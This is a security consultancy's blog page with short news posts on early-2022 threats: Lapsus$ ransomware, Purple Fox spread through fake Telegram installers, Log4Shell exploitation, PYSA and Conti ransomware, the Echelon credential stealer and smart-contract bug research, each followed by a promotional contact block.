Airzero Sec

We Do Not Give Up ! Trust US !

With the arrival of 2022, ransomware operators are back in business. It had only been a week into the new year when investigators administered a notification about the newly discovered Lapsus$ ransomware.

What's the latest?

  • During the New Year's holiday, Impresa, Portugal's largest media conglomerate, was infected with the new Lapsus$ ransomware.
  • The gang claimed responsibility for the attack by defacing all Impresa websites with a ransom note.
  • The attack, however, had no effect on radio or cable television broadcasts.
  • While the company has reclaimed control of many of its impacted sites, the gang claims to still have access to company resources.

The overall picture

  • The Lapsus$ group had hacked several other organizations since its discovery in December 2021.
  • This included an attack on the websites of Brazil's Ministry of Health, which resulted in the loss of COVID-19 vaccination data for millions of citizens.
  • Claro and Embratel, two South American telecommunications companies, were the other two victims.

In conclusion

For cybercriminals, ransomware is a lucrative business. It's working and it's paying off. With each passing year, threat actors become more creative in their extortion and propagation techniques, posing a significant threat to organizations. Instead of becoming a sitting duck for such threats, organizations must strengthen their cybersecurity posture by implementing a robust backup process and detection measures for malicious activities.

Airzero Sec is leading the way in innovation to help you overcome your most difficult security challenges. If you have any questions about newly discovered Lapsus$ ransomware targets, please contact us.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

On infected PCs, Trojanized Telegram chat app installers are being used to disseminate the Windows-based Purple Fox backdoor.

According to recent research from Minerva Labs, the attack differs from other types of intrusions that often exploit legitimate software to deliver harmful payloads.

"By separating the attack into considerable little files, the majority of which had very low detection speeds by engines, with the last stage leading to Purple Fox rootkit infection," said researcher Natalie Zargarov.

Purple Fox was identified in 2018 and possesses rootkit characteristics, allowing it to elude detection by being planted outside the reach of security solutions. In a March 2021 study, Guardicore described its worm-like propagation function, which allows the backdoor to proliferate faster.

Then, in October 2021, Trend Micro researchers uncovered FoxSocket, a.NET implant used in conjunction with Purple Fox to interact with its command-and-control (C2) servers using WebSockets for a more secure method of communication.

The researchers concluded, "Purple Fox stays on impacted systems longer and delivers extra payloads."

Finally, in December 2021, Trend Micro revealed the Purple Fox infection chain's later stages, which include targeting SQL databases by inserting a malicious SQL common language runtime (CLR) module to gain a steady and stealthier performance and eventually abusing SQL servers for illicit cryptocurrency mining.

Minerva identified a new attack chain that starts with a Telegram installer file, an AutoIt script that drops a legal Telegram installer, and a malicious downloader called "TextInputh.exe," which is used to download next-stage malware from the C2 server.

Following that, the downloaded files disable antivirus engine processes before moving on to the last stage, which involves downloading and executing the Purple Fox rootkit from a now-defunct remote server.

"We detected a huge number of malware installers that used the same attack chain to deploy the same Purple Fox rootkit version," Zargarov added.”The attack's beauty is that each stage is segregated into its own file, leaving it unusable without the complete file set."

Every business faces daunting challenges when it comes to protecting its assets:

  • Threats that are new and evolving

  • Regulations governing privacy and compliance

  • The increased risk associated with digital transformation

With hundreds of point-solution dealers and cheap, inadequate tools, companies face a cyber security dilemma that can only be solved by a truly integrated cyber defense.

Airzero Sec is driving innovation to assist you in overcoming your most difficult challenges. If you have any questions about the fake telegram messenger app. Contact us through the given email.

Email:[email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

A team of researchers from the University of California, Santa Barbara, has demonstrated a "scalable technique" for vetting smart contracts and mitigating state-inconsistency bugs, uncovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs that are stored on the blockchain and are automatically executed when predetermined conditions are met based on the agreement's encoded terms. They enable anonymous parties to carry out trusted transactions and agreements without the need for a central authority.

In other words, the code is intended to be the final arbiter of "the deal" that it represents, with the program controlling all aspects of execution and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also implies that vulnerabilities in the code could result in significant losses, as evidenced by hacks against the DAO and, more recently, MonoX, in which adversaries exploited loopholes to illicitly syphon funds, a scenario that could have disastrous consequences given the burgeoning adoption of smart contracts in recent years.

"Because smart contracts are not easily upgradeable, auditing the contract's source prior to deployment and deploying a bug-free contract is even more important than in the case of traditional software," the researchers wrote in a paper.

Enter Sailfish, which aims to detect state inconsistency vulnerabilities in smart contracts that allow an attacker to tamper with transaction execution order or take over control flow within a single transaction (i.e., reentrancy).

The tool operates as follows. Given a smart contract, Sailfish converts it into a dependency graph, which captures the control and data flow relations between storage variables and smart contract state-changing instructions, and uses it to identify potential flaws by defining hazardous access, which is implemented as graph queries to determine whether two different execution paths, at least one of which is a write operation, operate on the same storage variable.

The researchers tested Sailfish on 89,853 contracts obtained from Etherscan, discovering 47 zero-day vulnerabilities that could be exploited to drain Ether and even corrupt application-specific metadata.

This also includes a vulnerable contract implementing a housing tracker that could be abused in such a way that a homeowner could have multiple active listings. The study's findings will be presented at the IEEE Symposium on Security and Privacy (S&P) in May 2022.

This is not the first time that academics have been drawn to problematic smart contracts. In September 2020, Chinese researchers created a framework for categorizing known vulnerabilities in smart contracts, with the goal of providing a detection criterion for each bug.

Airzero Sec's cybersecurity experts have worked on a wide range of projects for a number of well-known companies for many years. Use our previous experience to your advantage, whether it's to assist you in getting there or to perform technical tests. If you have any doubts about the aforementioned issue, please contact us. Please do not hesitate to get in touch with us.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

Microsoft has issued a warning about continuous attempts by nation-state adversaries and commodity attackers to use security holes in the Log4j open-source logging platform to spread malware on vulnerable computers.

"Exploitation shots and testing have remained high over the closing weeks of December," according to revised guidance published earlier this week by Microsoft Threat Intelligence Center. "We've seen a number of living attackers incorporate these vulnerabilities into their existing malware kits and methods, ranging from coin miners to hands-on-keyboard attacks," says the researcher.

The Apache Software Foundation formally revealed the remote code execution (RCE) vulnerability in Apache Log4j 2, dubbed Log4Shell, on December 10, 2021, and it has since emerged as a new attack vector for a number of threat actors.

Four more vulnerabilities in the utility were discovered in the weeks after that — CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, and CVE-2021-44832 — allowing opportunistic bad actors to maintain persistent control over the compromised machines and mount an evolving collection of attacks going from cryptocurrency miners to ransomware.

Efforts are being made to circumvent string-matching detections by obfuscating the malicious HTTP requests staged to build a web request log using Log4j that utilizes JNDI to complete a submission to the attacker-controlled site, even as mass scanning attempts continue unabated.

"Rapid approval of the exposure into living botnets like Mirai, past efforts targeting susceptible Elasticsearch servers to deploy cryptocurrency miners, and activities distributing the Tsunami backdoor to Linux systems," according to Microsoft. Additional remote access toolkits and reverse shells, such as Meterpreter, Bladabindi (aka NjRAT), and habitsRAT, have been delivered via the Log4Shell vulnerability.

"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent is known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it's to aid you in getting there or to undertake technical tests. If you have any doubt about the above topic. Don’t hesitate to contact us. Airzero Cloud will be your digital companion.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

PYSA, which has surpassed the Conti ransomware gang, has found success with government-sector attacks.

PYSA, also known as Mespinoza, has reached Conti as the leading ransomware threat group in November. It joined the ranks of Lock bit, which has dominated the space since August.

According to NCC Group's November ransomware insights, PYSA increased its market share with a 50% increase in the number of targeted organizations, including a 400% increase in attacks against government-sector systems.

Double-Extortion and Beyond

PYSA frequently uses double-extortion against its marks, exfiltrating and encrypting data before threatening to publicly publish the data if the victim does not pay the ransom.

The FBI issued a special alert about PYSA's focus on the education sector in March, warning schools to be on the lookout for phishing lures and brute-force Remote Desktop Protocol attacks as initial-access techniques.

Everest Changes Tactics to Sell Early Access

According to NCC Group, the Russian-language ransomware positioned Everest is getting its extortion tactics to the next level, threatening to sell off access to targeted systems if their demands are not met.

According to NCC Group, Everest would sometimes skip the ransom demand entirely and instead focus on selling access. Analysts are keeping a close eye on this to see if it sparks a new trend among other groups.

"While ransomware-as-a-benefit has grown in favour in the last year, this is an example of a group preceding a ransom demand and rather of delivering access to IT infrastructure – but we may witness copycat aggression in 2022 and beyond," the report said. According to the NCC Group, the regions with the most attacks are North America and Europe.

Conti is making a comeback.

Meanwhile, the Russian-language group Conti's prevalence fell by 9.1 percent. However, the threat group is expected to make amends in December by announcing that it was the first professional ransomware attacker to develop a full weaponized attack chain against the Log4Shell vulnerability.

According to an advance report from last week, Conti's advantage is its size: The organization "plays a unique role in today's threat landscape, owing to its size."

Airzero Sec's Cybersecurity experts have been working on a variety of projects for a number of well-known organizations for many years. Use our prior experience to your advantage, whether it's to assist you in getting there or to conduct technical tests. If you have any concerns about PYSA emerging as the leading ransomware actor, please contact us. Airzero Sec will be your companion.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

According to researchers, attackers are spreading the harmful Echelon info stealer, which steals credentials for cryptocurrencies and other user accounts, using the Telegram handle "Smokes Night."

Attackers are employing the Echelon info stealer to target Telegram users' crypto-wallets in an attempt to swindle new or naïve users of a cryptocurrency discussion channel on the messaging network, according to researchers.

According to an inquiry posted on Thursday, researchers from SafeGuard Cyber's Division Seven hazard analysis section identified a sample of Echelon in a cryptocurrency-focused Telegram chat in October.

The malware used in the campaign is set to rob certificates from a variety of messaging and file-sharing platforms, such as Discord, Edge, FileZilla, OpenVPN, Outlook, and even Telegram itself, as well as cryptocurrency wallets, such as AtomicWallet, BitcoinCore, and ByteCoin.

The effort was a "spray and pray" operation, according to the report: "Based on the malware and the way in which it was released, SafeGuard Cyber believes it was not part of a coordinated campaign and was merely targeting new or inexperienced users of the channel."

Researchers decided that assailants tried to spread Echelon on the channel utilizing the handle "Smokes Night," although it's unclear how effective they were.

"The post seemed not to be a reaction to any of the surrounding posts in the channel," they stated.

Other users on the track, they assert, did not seem to detect anything strange or respond to the message. According to the researchers, this does not mean that the malware did not reach consumers' devices.

"We did not notice anyone answer to 'Smoke Night' or whine about the file," they said, "but this does not rule out the possibility that channel members were infected."

Cybercriminals have taken advantage of Telegram's popularity and large attack surface by distributing malware on the platform via bots, rogue accounts, and other methods.

Malware Analysis

The Echelon credential thief was furnished to the cryptocurrency channel via a.RAR file called "present).rar," which contained three files: "pass – 123.txt," a benign text document containing a password; "DotNetZip.dll," a non-hostile type library and toolset for manipulating.ZIP files; and "Present.exe," the malicious executable for the Echelon credential stealer.

The.NET payload also contains obfuscation utilizing the open-source ConfuserEx program, as well as two anti-debugging capabilities that promptly terminate the process if a debugger or other malware analysis tools are identified.

Researchers were able to decode the code and look inside the Echelon sample that was sent to Telegram channel subscribers. According to the researchers, they identified domain detection, which implies the sample would try to steal data from any domain that the victim has visited. A detailed list of platforms that the Echelon sample attempted to target is included in the report.

Other aspects of the malware, according to the researchers, include computer fingerprinting and the ability to take a screenshot of the victim's workstation. According to the researchers, the Echelon model used in the campaign transmits credentials, other stolen data, and screenshots back to a command-and-control server through a compressed.ZIP file.

According to the researchers, Windows Defender detects and deletes the Present.exe malicious executable sample and flags it as '#LowFI: HookwowLow,' protecting users who have the antivirus program from any potential Echelon damage.

For years, Airzero Sec's Cyber Security Consulting experts have worked on a variety of projects for a number of well-known organizations. Use our previous experience to your advantage, whether it's to help you get there or to perform technical tests. If you have any doubts about telegram being used to steal passwords of bitcoin wallets, please contact us. Airzero sec will be your digital partner.

Email:[email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/